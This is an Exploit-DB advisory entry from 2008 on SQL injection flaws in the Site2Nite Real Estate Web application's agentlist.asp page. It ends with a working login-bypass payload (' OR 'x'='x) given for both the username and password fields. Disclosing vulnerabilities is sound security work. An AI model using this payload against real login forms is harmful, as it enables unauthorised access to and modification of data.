Site2Nite Real Estate Web - 'agentlist.asp' Multiple SQL Injections

EDB-ID:

31191


Author:

S@BUN

Type:

webapps


Platform:

ASP

Date:

2008-02-13


source: https://www.securityfocus.com/bid/27779/info

Site2Nite Real Estate Web is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

The following proof-of-concept login and password examples are available:

Login: anything' OR 'x'='x
Password: anything' OR 'x'='x